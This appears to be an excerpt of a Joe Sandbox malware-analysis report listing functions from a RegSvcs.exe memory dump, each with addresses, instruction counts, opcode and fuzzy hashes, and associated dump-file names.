Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8876ef4560123714944e026a14010e42f3722aa8b4e83154c385705386cccce
Instruction ID: 77f008e43b86789cfb5bbdcd4b0d856c33a7073a09d3e4e46127f48acf771b84
Opcode Fuzzy Hash: b8876ef4560123714944e026a14010e42f3722aa8b4e83154c385705386cccce
Instruction Fuzzy Hash: E7F0F97220001DBFEF059F95DD80DEF7B7EEB59698B104125FA1192160D735DD21EBA0

Function 0112C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
Instruction ID: bcf8d1811b137042733d4bc83786d93670e86d53a25a8b2a33c984e1a919f976
Opcode Fuzzy Hash: 304251878284b713c8060242cf3853fc41db4a66cc798d0c24d69f3ae3befdce
Instruction Fuzzy Hash: 61F024716042619BF71DA61D9D02B66329AEBD0650F35C02AEB058B2C1EBB1EC1183D5

Function 0116656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
Instruction ID: f63cc4e7b64edc0b958392079a08b3c83f1ab5ecb7c6fdc047189ad46e2d57fd
Opcode Fuzzy Hash: 94c4a923a819c7a2392a2f4c8184d9ce29b7a1b1621a738148161288101f375a
Instruction Fuzzy Hash: 1001AF74204A819BE33E9B2CCD49B693BA8BF40B84F894194FA018BAD6D7A9D411C211

Function 0116A5D0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffc0d365d3eddcd4a5dd878276fad65ae144387fc4c96e186e7df46bd6fc9f9f
Instruction ID: 16c7df5dc7838af063adc0746d3743e4e95e0bc9b85e58a4cf6ddc8c3cc51378
Opcode Fuzzy Hash: ffc0d365d3eddcd4a5dd878276fad65ae144387fc4c96e186e7df46bd6fc9f9f
Instruction Fuzzy Hash: 0A014FB2200700AFD326CF24ED09F2A77E8EB80B29F008839F608C7580E374E810CB46

Function 01140218 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0e5863a0ed811f7276e96d074f7dec2e30844b7842ee37325ab9f66aeedb985
Instruction ID: 64f106b011e97a61131269f2e871f9e266a7cde178306de4952130c6bb99c968
Opcode Fuzzy Hash: c0e5863a0ed811f7276e96d074f7dec2e30844b7842ee37325ab9f66aeedb985
Instruction Fuzzy Hash: F2F09A36921611EFE32EDF19E800B683BA1FF09F04F6101A9F6018F2A1D3388884CB51

Function 011BE872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8131d6dfb1e0f05e7222055ba00f4a0047b676927548f67fe4833d003efa681a
Instruction ID: 43d8af980d55c204edaed4326555fb7009f90729431410d05d8faeec3b8b3800
Opcode Fuzzy Hash: 8131d6dfb1e0f05e7222055ba00f4a0047b676927548f67fe4833d003efa681a
Instruction Fuzzy Hash: 2FF089337529219BD7399A4DDCC0FD6B768EFD5A60F1A0065E6149B260C760EC02C7D0

Function 011BC89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eeb0c6f7928ab02853cd696d5da46c6c1aafc04dd259b1a4b72f06fcf06a503
Instruction ID: 4389c8f059d92831b816305cd8eef0957070bca8121a691d0cb8cadae67838fc
Opcode Fuzzy Hash: 7eeb0c6f7928ab02853cd696d5da46c6c1aafc04dd259b1a4b72f06fcf06a503
Instruction Fuzzy Hash: F2F0AF706153059FC318EF28C845A1EB7E4FF98714F40465AB898DB390E734EA01CB96

Function 0114266C Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 067ba79b3ebac75dda1a999f5f2ca98161ae6fe91980adcd2c4202d0efa67d75
Instruction ID: e403a703550d961e568d1b15e1037ceff1fae611d4b68c06a5a06a3b1b41ba96
Opcode Fuzzy Hash: 067ba79b3ebac75dda1a999f5f2ca98161ae6fe91980adcd2c4202d0efa67d75
Instruction Fuzzy Hash: C2F090327146418FC716DF6DE8407A6B3E4FF55215B044176E559CB201E738DA52CBE0

Function 01160854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 069867b1baab19b033e574ad56a2d3a105b1f15a30bd363ec6666690433cf801
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: E8F0F072A00204AFE328DB25CC00F86B7EDEF9C304F148068A944D7160EBB1DD50C754

Function 011BC912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21b7683bd3985aebe654bbdc7adedbdb2319cb9f2b85f707f4e5ab40d89b5bf
Instruction ID: a48bfd8bcfe54e983004d0c0f2ddca5416480c979941e25c81a928c98b93a5d1
Opcode Fuzzy Hash: a21b7683bd3985aebe654bbdc7adedbdb2319cb9f2b85f707f4e5ab40d89b5bf
Instruction Fuzzy Hash: DCF0AF70A00209EFDB08EF69C555A9EB7B4FF18304F008056E855EB385EB34EA01CB91

Function 011347FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c57071edfb476812f770a422826df7679bb75898e0623da4b5ebf685b73ab60
Instruction ID: fa4dc2613daca498ac9210fefbc67f2404e2bed032f89b52108a0ad01811eba2
Opcode Fuzzy Hash: 6c57071edfb476812f770a422826df7679bb75898e0623da4b5ebf685b73ab60
Instruction Fuzzy Hash: 4CF02E359122E09FE73BCBECC404B21BBC49B80B20F0989EAC58983D6AC324D880CA41

Function 0116C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ed3b5206790689346617a90d52ab369c5e4fea73efd9b42bb0709ccb642bd5
Instruction ID: a9c4d15503c426b3b195ce83ef033fd394b9ee82ec44d85815472d206444d4fd
Opcode Fuzzy Hash: d9ed3b5206790689346617a90d52ab369c5e4fea73efd9b42bb0709ccb642bd5
Instruction Fuzzy Hash: BEF052714116809FE32E971CC108B217BDC9B407A1F09A421C48AC3B42C365FCA0CAC9

Function 01172619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c25d90bbb005ca3a51a0e548ad18c23c0ce8c105f3add510330fe6c677b30c
Instruction ID: 9324e425142cdfcb1fb8516925e77fd9c809d61cdb7068025f694210d900844e
Opcode Fuzzy Hash: 45c25d90bbb005ca3a51a0e548ad18c23c0ce8c105f3add510330fe6c677b30c
Instruction Fuzzy Hash: 76E0D8723006012BE7269E598CC0F47777EEFD2B14F04007AB9045F351CBE2DC0982A4

Function 011A035C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d686609aa5636bbeb8eb45ce840330d6a3fe488abb698859fe5c2a4ac7472896
Instruction ID: b7bf9108bc2d303ffbd0c3715e3d8b53909a0e0543a4b779f4a4a32b8223fd6c
Opcode Fuzzy Hash: d686609aa5636bbeb8eb45ce840330d6a3fe488abb698859fe5c2a4ac7472896
Instruction Fuzzy Hash: F7F01D3525AAC2EFE32E8B1CC848B153BA4AF05B64F190290BA218B6E1D7689880C605

Function 011A01DA Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695efabd4245ad5634dfe4a889b4c53fedba2a3276a13ee318552dc71ff97b6c
Instruction ID: fc61d84572c11960d7c9a4ec88de777fa9f0a04b24e760f46f2124458062b768
Opcode Fuzzy Hash: 695efabd4245ad5634dfe4a889b4c53fedba2a3276a13ee318552dc71ff97b6c
Instruction Fuzzy Hash: 39F03274204B82DFD369CFA8D440B26BBE4FF08300F00866AB6A4CB6A1D374E840CB12

Function 01130710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 7644a790b8fdf50d37e7b484593f607934d95f41e5ce8a7e5ddffa80f3e3cf96
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: 05F0E539204B419BDB1FDF19C040A997BE4FB85360B014094F8828B301D731E981CF91

Function 011649D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 3ce726346e90f5698cbc2afb85cc2271e445b0aed2d22c959267016937ec407d
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 09E0D832244145BBD3395E598800F6E77AEDBD0FA4F160429E2429B950DB72DC50C7E8

Function 0112EC20 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2902f53431a9e488bb3a35122719d683f2200cde1b251d880592bb7dfab3b44
Instruction ID: c5ce5c6b04886333c6088f0c3c302a8613c12380af5ffce34928952cea5b730e
Opcode Fuzzy Hash: b2902f53431a9e488bb3a35122719d683f2200cde1b251d880592bb7dfab3b44
Instruction Fuzzy Hash: 6EF0ED311062D9EFEF1DDB8AE804F253BA9EB00328F048519F9089B192CB74DDB4CB05

Function 011B4CA8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43eecd3c08fe7f7df93ce42b225f7ebba8bd63f8cfa5a27548bae60b679425d2
Instruction ID: 9da3e066d6302f990671160e4935aae10322547237976fc11abc0b985a571f8c
Opcode Fuzzy Hash: 43eecd3c08fe7f7df93ce42b225f7ebba8bd63f8cfa5a27548bae60b679425d2
Instruction Fuzzy Hash: C9E0263320410176EB396769AD08FD37F96DF80BB0F044025F24A87990DF21C431D240

Function 011325E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff2b80dcbcf4ac8f65f98648a61aa6fbad554d45477065255cd9bd8c878566cf
Instruction ID: a304fc52c9cbdf36b8c8be430e6ebaf6fcd992e781c8c577e102bdf21b02a8df
Opcode Fuzzy Hash: ff2b80dcbcf4ac8f65f98648a61aa6fbad554d45477065255cd9bd8c878566cf
Instruction Fuzzy Hash: 43E0D872100654ABC335FF29DD01F9B77AAEFA4768F014515F11557594CB34AC11C7C8

Function 011B4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
